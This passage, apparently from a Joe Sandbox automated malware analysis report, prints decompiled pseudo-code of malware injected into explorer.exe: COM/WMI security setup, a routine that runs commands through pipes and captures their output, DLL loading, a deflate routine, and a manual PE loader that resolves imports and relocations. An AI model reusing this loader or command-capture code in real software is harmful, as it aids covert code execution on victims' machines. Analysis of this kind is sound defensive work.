        				void* _t30;
        				void* _t33;
        
        				_v12 = 0;
        				_v8 = 0;
        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
        				_t15 =  &_v12;
        				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
        				if(_t15 < 0) {
        					L5:
        					_t23 = _v8;
        					if(_t23 != 0) {
        						 *((intOrPtr*)( *_t23 + 8))(_t23);
        					}
        					_t24 = _v12;
        					if(_t24 != 0) {
        						 *((intOrPtr*)( *_t24 + 8))(_t24);
        					}
        					_t16 = 0;
        				} else {
        					__imp__#2(__ecx);
        					_t25 = _v12;
        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
        					if(_t21 < 0) {
        						goto L5;
        					} else {
        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
        						if(_t21 < 0) {
        							goto L5;
        						} else {
        							_t16 = E00088604(8);
        							if(_t16 == 0) {
        								goto L5;
        							} else {
        								 *((intOrPtr*)(_t16 + 4)) = _v12;
        								 *_t16 = _v8;
        							}
        						}
        					}
        				}
        				return _t16;
        			}

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
        • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
        • SysAllocString.OLEAUT32(00000000), ref: 0008D569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
        • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
        • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
        • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E000921FF(char* __eax, char** _a4, long long* _a8) {
        				char* _v8;
        				long long _v16;
        				char* _t9;
        				signed char _t11;
        				char** _t19;
        				char _t22;
        				long long _t32;
        				long long _t33;
        
        				_t9 = __eax;
        				L000922CD();
        				_t19 = _a4;
        				_t22 =  *__eax;
        				if( *_t22 != 0x2e) {
        					_t9 = strchr( *_t19, 0x2e);
        					if(_t9 != 0) {
        						 *_t9 =  *_t22;
        					}
        				}
        				L00092291();
        				 *_t9 =  *_t9 & 0x00000000;
        				_t11 = strtod( *_t19,  &_v8);
        				asm("fst qword [ebp-0xc]");
        				_t32 =  *0x98250;
        				asm("fucomp st1");
        				asm("fnstsw ax");
        				if((_t11 & 0x00000044) != 0) {
        					L5:
        					st0 = _t32;
        					L00092291();
        					if( *_t11 != 0x22) {
        						_t33 = _v16;
        						goto L8;
        					} else {
        						return _t11 | 0xffffffff;
        					}
        				} else {
        					_t33 =  *0x98258;
        					asm("fucomp st1");
        					asm("fnstsw ax");
        					if((_t11 & 0x00000044) != 0) {
        						L8:
        						 *_a8 = _t33;
        						return 0;
        					} else {
        						goto L5;
        					}
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
        • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
        • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
        • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E0008A9B7(signed int __ecx) {
        				void* _v8;
        				void* _v12;
        				void* _v16;
        				void* _v20;
        				signed int _v24;
        				char _v28;
        				char _v32;
        				char _v36;
        				struct _SECURITY_ATTRIBUTES _v48;
        				intOrPtr _v60;
        				char _v64;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				void* _v84;
        				short _v92;
        				intOrPtr _v96;
        				void _v140;
        				intOrPtr _t77;
        				void* _t79;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				intOrPtr _t92;
        				intOrPtr _t98;
        				intOrPtr _t100;
        				intOrPtr _t102;
        				long _t111;
        				intOrPtr _t115;
        				intOrPtr _t126;
        				void* _t127;
        				void* _t128;
        				void* _t129;
        				void* _t130;
        
        				_t111 = 0;
        				_v24 = __ecx;
        				_v12 = 0;
        				_v20 = 0;
        				_t127 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				_v48.nLength = 0xc;
        				_v48.lpSecurityDescriptor = 0;
        				_v48.bInheritHandle = 1;
        				_v28 = 0;
        				memset( &_v140, 0, 0x44);
        				asm("stosd");
        				_t130 = _t129 + 0xc;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
        					L18:
        					return 0;
        				}
        				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
        					L13:
        					E0008861A( &_v28, 0);
        					if(_v20 != 0) {
        						_t77 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t77 + 0x30))(_v20);
        					}
        					if(_v8 != 0) {
        						_t115 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t115 + 0x30))(_v8);
        					}
        					return _t111;
        				}
        				_t79 = _v16;
        				_v76 = _t79;
        				_v80 = _t79;
        				_v84 = _v12;
        				_v140 = 0x44;
        				_v96 = 0x101;
        				_v92 = 0;
        				_t126 = E00088604(0x1001);
        				_v28 = _t126;
        				if(_t126 == 0) {
        					goto L18;
        				}
        				_push( &_v64);
        				_push( &_v140);
        				_t85 =  *0x9e684; // 0x133f8f0
        				_push(0);
        				_push(0);
        				_push(0x8000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push(_v24);
        				_push(0);
        				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
        					goto L13;
        				}
        				_t87 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t87 + 0x30))(_v12);
        				_t89 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t89 + 0x30))(_v16);
        				_v24 = _v24 & 0;
        				do {
        					_t92 =  *0x9e684; // 0x133f8f0
        					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
        					 *((char*)(_v24 + _t126)) = 0;
        					if(_t111 == 0) {
        						_t127 = E000891A6(_t126, 0);
        					} else {
        						_push(0);
        						_push(_t126);
        						_v32 = _t127;
        						_t127 = E00089292(_t127);
        						E0008861A( &_v32, 0xffffffff);
        						_t130 = _t130 + 0x14;
        					}
        					_t111 = _t127;
        					_v32 = _t127;
        				} while (_v36 != 0);
        				_push( &_v36);
        				_push(E0008C379(_t127));
        				_t98 =  *0x9e68c; // 0x133fab8
        				_push(_t127);
        				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
        					L12:
        					_t100 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t100 + 0x30))(_v64);
        					_t102 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t102 + 0x30))(_v60);
        					goto L13;
        				}
        				_t128 = E00089256(_t127);
        				if(_t128 == 0) {
        					goto L12;
        				}
        				E0008861A( &_v32, 0);
        				return _t128;
        			}

        APIs
        • memset.MSVCRT ref: 0008A9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
        • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
        • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
        • Opcode Fuzzy Hash: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
        • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
        				char _v8;
        				char _v12;
        				void _v140;
        				signed char _t14;
        				char _t15;
        				intOrPtr _t20;
        				void* _t25;
        				intOrPtr _t26;
        				intOrPtr _t32;
        				WCHAR* _t34;
        				intOrPtr _t35;
        				struct HINSTANCE__* _t37;
        				int _t38;
        				intOrPtr _t46;
        				void* _t47;
        				intOrPtr _t50;
        				void* _t60;
        				void* _t61;
        				char _t62;
        				char* _t63;
        				void* _t65;
        				intOrPtr _t66;
        				char _t68;
        
        				_t65 = __esi;
        				_t61 = __edi;
        				_t47 = __ebx;
        				_t50 =  *0x9e688; // 0xb0000
        				_t14 =  *(_t50 + 0x1898);
        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
        					_t15 = E000895E1(_t50, 0xb62);
        					_t66 =  *0x9e688; // 0xb0000
        					_t62 = _t15;
        					_t67 = _t66 + 0xb0;
        					_v8 = _t62;
        					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
        					_t20 =  *0x9e688; // 0xb0000
        					asm("sbb eax, eax");
        					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
        					_t63 = "\\";
        					_t26 =  *0x9e688; // 0xb0000
        					_t68 = E000892E5(_t26 + 0x1020);
        					_v12 = _t68;
        					E000885D5( &_v8);
        					_t32 =  *0x9e688; // 0xb0000
        					_t34 = E000892E5(_t32 + 0x122a);
        					 *0x9e784 = _t34;
        					_t35 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
        					_t37 = LoadLibraryW( *0x9e784);
        					 *0x9e77c = _t37;
        					if(_t37 == 0) {
        						_t38 = 0;
        					} else {
        						_push(_t37);
        						_t60 = 0x28;
        						_t38 = E0008E171(0x9bb48, _t60);
        					}
        					 *0x9e780 = _t38;
        					E0008861A( &_v12, 0xfffffffe);
        					memset( &_v140, 0, 0x80);
        					if( *0x9e780 != 0) {
        						goto L10;
        					} else {
        						E0008861A(0x9e784, 0xfffffffe);
        						goto L8;
        					}
        				} else {
        					L8:
        					if( *0x9e780 == 0) {
        						_t46 =  *0x9e6bc; // 0x133fa18
        						 *0x9e780 = _t46;
        					}
        					L10:
        					return 1;
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
        • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
        • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
        • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E00092D70(int _a4, signed int _a8) {
        				int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				void* __esi;
        				void* _t137;
        				signed int _t141;
        				intOrPtr* _t142;
        				signed int _t145;
        				signed int _t146;
        				intOrPtr _t151;
        				intOrPtr _t161;
        				intOrPtr _t162;
        				intOrPtr _t167;
        				intOrPtr _t170;
        				signed int _t172;
        				intOrPtr _t173;
        				int _t184;
        				intOrPtr _t185;
        				intOrPtr _t188;
        				signed int _t189;
        				void* _t195;
        				int _t202;
        				int _t208;
        				intOrPtr _t217;
        				signed int _t218;
        				int _t219;
        				intOrPtr _t220;
        				signed int _t221;
        				signed int _t222;
        				int _t224;
        				int _t225;
        				signed int _t227;
        				intOrPtr _t228;
        				int _t232;
        				int _t234;
        				signed int _t235;
        				int _t239;
        				void* _t240;
        				int _t245;
        				int _t252;
        				signed int _t253;
        				int _t254;
        				void* _t257;
        				void* _t258;
        				int _t259;
        				intOrPtr _t260;
        				int _t261;
        				signed int _t269;
        				signed int _t271;
        				intOrPtr* _t272;
        				void* _t273;
        
        				_t253 = _a8;
        				_t272 = _a4;
        				_t3 = _t272 + 0xc; // 0x452bf84d
        				_t4 = _t272 + 0x2c; // 0x8df075ff
        				_t228 =  *_t4;
        				_t137 =  *_t3 + 0xfffffffb;
        				_t229 =  <=  ? _t137 : _t228;
        				_v16 =  <=  ? _t137 : _t228;
        				_t269 = 0;
        				_a4 =  *((intOrPtr*)( *_t272 + 4));
        				asm("o16 nop [eax+eax]");
        				while(1) {
        					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
        					_t141 =  *_t8 + 0x2a >> 3;
        					_v12 = 0xffff;
        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
        					if(_t217 < _t141) {
        						break;
        					}
        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
        					_t12 = _t272 + 0x5c; // 0x84e85000
        					_t245 =  *_t11 -  *_t12;
        					_v8 = _t245;
        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
        					_t247 =  <  ? _t195 : _v12;
        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
        					if(_t227 >= _v16) {
        						L7:
        						if(_t253 != 4) {
        							L10:
        							_t269 = 0;
        							__eflags = 0;
        						} else {
        							_t285 = _t227 - _t195;
        							if(_t227 != _t195) {
        								goto L10;
        							} else {
        								_t269 = _t253 - 3;
        							}
        						}
        						E00095D90(_t272, _t272, 0, 0, _t269);
        						_t18 = _t272 + 0x14; // 0xc703f045
        						_t19 = _t272 + 8; // 0x8d000040
        						 *( *_t18 +  *_t19 - 4) = _t227;
        						_t22 = _t272 + 0x14; // 0xc703f045
        						_t23 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
        						_t26 = _t272 + 0x14; // 0xc703f045
        						_t27 = _t272 + 8; // 0x8d000040
        						 *( *_t26 +  *_t27 - 2) =  !_t227;
        						_t30 = _t272 + 0x14; // 0xc703f045
        						_t31 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
        						E00094AF0(_t285,  *_t272);
        						_t202 = _v8;
        						_t273 = _t273 + 0x14;
        						if(_t202 != 0) {
        							_t208 =  >  ? _t227 : _t202;
        							_v8 = _t208;
        							_t36 = _t272 + 0x38; // 0xf47d8bff
        							_t37 = _t272 + 0x5c; // 0x84e85000
        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
        							_t273 = _t273 + 0xc;
        							_t252 = _v8;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
        							_t227 = _t227 - _t252;
        						}
        						if(_t227 != 0) {
        							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
        							_t273 = _t273 + 0xc;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
        						}
        						_t253 = _a8;
        						if(_t269 == 0) {
        							continue;
        						}
        					} else {
        						if(_t227 != 0 || _t253 == 4) {
        							if(_t253 != 0 && _t227 == _t195) {
        								goto L7;
        							}
        						}
        					}
        					break;
        				}
        				_t142 =  *_t272;
        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
        				_a4 = _t232;
        				if(_t232 == 0) {
        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
        					_t254 =  *_t83;
        				} else {
        					_t59 = _t272 + 0x2c; // 0x8df075ff
        					_t224 =  *_t59;
        					if(_t232 < _t224) {
        						_t65 = _t272 + 0x3c; // 0x830cc483
        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
        						_t260 =  *_t66;
        						__eflags =  *_t65 - _t260 - _t232;
        						if( *_t65 - _t260 <= _t232) {
        							_t67 = _t272 + 0x38; // 0xf47d8bff
        							_t261 = _t260 - _t224;
        							 *(_t272 + 0x6c) = _t261;
        							memcpy( *_t67,  *_t67 + _t224, _t261);
        							_t70 = _t272 + 0x16b0; // 0xdf750008
        							_t188 =  *_t70;
        							_t273 = _t273 + 0xc;
        							_t232 = _a4;
        							__eflags = _t188 - 2;
        							if(_t188 < 2) {
        								_t189 = _t188 + 1;
        								__eflags = _t189;
        								 *(_t272 + 0x16b0) = _t189;
        							}
        						}
        						_t73 = _t272 + 0x38; // 0xf47d8bff
        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
        						_t225 = _a4;
        						_t273 = _t273 + 0xc;
        						_t76 = _t272 + 0x6c;
        						 *_t76 =  *(_t272 + 0x6c) + _t225;
        						__eflags =  *_t76;
        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
        						_t184 =  *_t78;
        						_t79 = _t272 + 0x2c; // 0x8df075ff
        						_t239 =  *_t79;
        					} else {
        						 *(_t272 + 0x16b0) = 2;
        						_t61 = _t272 + 0x38; // 0xf47d8bff
        						memcpy( *_t61,  *_t142 - _t224, _t224);
        						_t62 = _t272 + 0x2c; // 0x8df075ff
        						_t184 =  *_t62;
        						_t273 = _t273 + 0xc;
        						_t225 = _a4;
        						_t239 = _t184;
        						 *(_t272 + 0x6c) = _t184;
        					}
        					_t254 = _t184;
        					 *(_t272 + 0x5c) = _t184;
        					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
        					_t185 =  *_t81;
        					_t240 = _t239 - _t185;
        					_t241 =  <=  ? _t225 : _t240;
        					_t242 = ( <=  ? _t225 : _t240) + _t185;
        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
        				}
        				if( *(_t272 + 0x16c0) < _t254) {
        					 *(_t272 + 0x16c0) = _t254;
        				}
        				if(_t269 == 0) {
        					_t218 = _a8;
        					__eflags = _t218;
        					if(_t218 == 0) {
        						L34:
        						_t89 = _t272 + 0x3c; // 0x830cc483
        						_t219 =  *_t272;
        						_t145 =  *_t89 - _t254 - 1;
        						_a4 =  *_t272;
        						_t234 = _t254;
        						_v16 = _t145;
        						_v8 = _t254;
        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
        							_v8 = _t254;
        							_t95 = _t272 + 0x5c; // 0x84e85000
        							_a4 = _t219;
        							_t234 = _t254;
        							_t97 = _t272 + 0x2c; // 0x8df075ff
        							__eflags =  *_t95 -  *_t97;
        							if( *_t95 >=  *_t97) {
        								_t98 = _t272 + 0x2c; // 0x8df075ff
        								_t167 =  *_t98;
        								_t259 = _t254 - _t167;
        								_t99 = _t272 + 0x38; // 0xf47d8bff
        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
        								 *(_t272 + 0x6c) = _t259;
        								memcpy( *_t99, _t167 +  *_t99, _t259);
        								_t103 = _t272 + 0x16b0; // 0xdf750008
        								_t170 =  *_t103;
        								_t273 = _t273 + 0xc;
        								__eflags = _t170 - 2;
        								if(_t170 < 2) {
        									_t172 = _t170 + 1;
        									__eflags = _t172;
        									 *(_t272 + 0x16b0) = _t172;
        								}
        								_t106 = _t272 + 0x2c; // 0x8df075ff
        								_t145 = _v16 +  *_t106;
        								__eflags = _t145;
        								_a4 =  *_t272;
        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
        								_t234 =  *_t108;
        								_v8 = _t234;
        							}
        						}
        						_t255 = _a4;
        						_t220 =  *((intOrPtr*)(_a4 + 4));
        						__eflags = _t145 - _t220;
        						_t221 =  <=  ? _t145 : _t220;
        						_t146 = _t221;
        						_a4 = _t221;
        						_t222 = _a8;
        						__eflags = _t146;
        						if(_t146 != 0) {
        							_t114 = _t272 + 0x38; // 0xf47d8bff
        							E00094C30(_t255,  *_t114 + _v8, _t146);
        							_t273 = _t273 + 0xc;
        							_t117 = _t272 + 0x6c;
        							 *_t117 =  *(_t272 + 0x6c) + _a4;
        							__eflags =  *_t117;
        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
        							_t234 =  *_t119;
        						}
        						__eflags =  *(_t272 + 0x16c0) - _t234;
        						if( *(_t272 + 0x16c0) < _t234) {
        							 *(_t272 + 0x16c0) = _t234;
        						}
        						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
        						_t123 = _t272 + 0xc; // 0x452bf84d
        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
        						__eflags = _t257 - 0xffff;
        						_t258 =  >  ? 0xffff : _t257;
        						_t124 = _t272 + 0x2c; // 0x8df075ff
        						_t151 =  *_t124;
        						_t125 = _t272 + 0x5c; // 0x84e85000
        						_t235 = _t234 -  *_t125;
        						__eflags = _t258 - _t151;
        						_t152 =  <=  ? _t258 : _t151;
        						__eflags = _t235 - ( <=  ? _t258 : _t151);
        						if(_t235 >= ( <=  ? _t258 : _t151)) {
        							L49:
        							__eflags = _t235 - _t258;
        							_t154 =  >  ? _t258 : _t235;
        							_a4 =  >  ? _t258 : _t235;
        							__eflags = _t222 - 4;
        							if(_t222 != 4) {
        								L53:
        								_t269 = 0;
        								__eflags = 0;
        							} else {
        								_t161 =  *_t272;
        								__eflags =  *(_t161 + 4);
        								_t154 = _a4;
        								if( *(_t161 + 4) != 0) {
        									goto L53;
        								} else {
        									__eflags = _t154 - _t235;
        									if(_t154 != _t235) {
        										goto L53;
        									} else {
        										_t269 = _t222 - 3;
        									}
        								}
        							}
        							_t131 = _t272 + 0x38; // 0xf47d8bff
        							_t132 = _t272 + 0x5c; // 0x84e85000
        							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
        							_t134 = _t272 + 0x5c;
        							 *_t134 =  *(_t272 + 0x5c) + _a4;
        							__eflags =  *_t134;
        							E00094AF0( *_t134,  *_t272);
        						} else {
        							__eflags = _t235;
        							if(_t235 != 0) {
        								L46:
        								__eflags = _t222;
        								if(_t222 != 0) {
        									_t162 =  *_t272;
        									__eflags =  *(_t162 + 4);
        									if( *(_t162 + 4) == 0) {
        										__eflags = _t235 - _t258;
        										if(_t235 <= _t258) {
        											goto L49;
        										}
        									}
        								}
        							} else {
        								__eflags = _t222 - 4;
        								if(_t222 == 4) {
        									goto L46;
        								}
        							}
        						}
        						asm("sbb edi, edi");
        						_t271 =  ~_t269 & 0x00000002;
        						__eflags = _t271;
        						return _t271;
        					} else {
        						__eflags = _t218 - 4;
        						if(_t218 == 4) {
        							goto L34;
        						} else {
        							_t173 =  *_t272;
        							__eflags =  *(_t173 + 4);
        							if( *(_t173 + 4) != 0) {
        								goto L34;
        							} else {
        								_t88 = _t272 + 0x5c; // 0x84e85000
        								__eflags = _t254 -  *_t88;
        								if(_t254 !=  *_t88) {
        									goto L34;
        								} else {
        									return 1;
        								}
        							}
        						}
        					}
        				} else {
        					return 3;
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
        				signed int _v5;
        				signed short _v12;
        				intOrPtr* _v16;
        				signed int* _v20;
        				intOrPtr _v24;
        				unsigned int _v28;
        				signed short* _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr* _v40;
        				signed short* _v44;
        				intOrPtr _v48;
        				unsigned int _v52;
        				intOrPtr _v56;
        				_Unknown_base(*)()* _v60;
        				signed int _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				unsigned int _v76;
        				intOrPtr _v80;
        				signed int _v84;
        				intOrPtr _v88;
        				signed int _t149;
        				void* _t189;
        				signed int _t194;
        				signed int _t196;
        				intOrPtr _t236;
        
        				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        				_v24 = _v72;
        				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
        				_v56 = _t236;
        				if(_t236 == 0) {
        					L13:
        					while(0 != 0) {
        					}
        					_push(8);
        					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
        						L35:
        						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
        						while(0 != 0) {
        						}
        						if(_a12 != 0) {
        							 *_a12 = _v68;
        						}
        						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
        						return _v68(_a4, 1, _a8);
        					}
        					_v84 = 0x80000000;
        					_t149 = 8;
        					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						if(_v36 == 0) {
        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						}
        						if(_v36 != 0) {
        							if( *_v16 == 0) {
        								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
        							} else {
        								_v20 =  *_v16 + _a4;
        							}
        							_v64 = _v64 & 0x00000000;
        							while( *_v20 != 0) {
        								if(( *_v20 & _v84) == 0) {
        									_v88 =  *_v20 + _a4;
        									_v60 = GetProcAddress(_v36, _v88 + 2);
        								} else {
        									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
        								}
        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
        									 *_v20 = _v60;
        								} else {
        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
        								}
        								_v20 =  &(_v20[1]);
        								_v64 = _v64 + 4;
        							}
        							_v16 = _v16 + 0x14;
        							continue;
        						} else {
        							_t189 = 0xfffffffd;
        							return _t189;
        						}
        					}
        					goto L35;
        				}
        				_t194 = 8;
        				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
        				_t196 = 8;
        				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
        				while(0 != 0) {
        				}
        				while(_v48 > 0) {
        					_v28 = _v44[2];
        					_v48 = _v48 - _v28;
        					_v28 = _v28 - 8;
        					_v28 = _v28 >> 1;
        					_v32 =  &(_v44[4]);
        					_v80 = _a4 +  *_v44;
        					_v52 = _v28;
        					while(1) {
        						_v76 = _v52;
        						_v52 = _v52 - 1;
        						if(_v76 == 0) {
        							break;
        						}
        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
        						_v12 =  *_v32 & 0xfff;
        						_v40 = (_v12 & 0x0000ffff) + _v80;
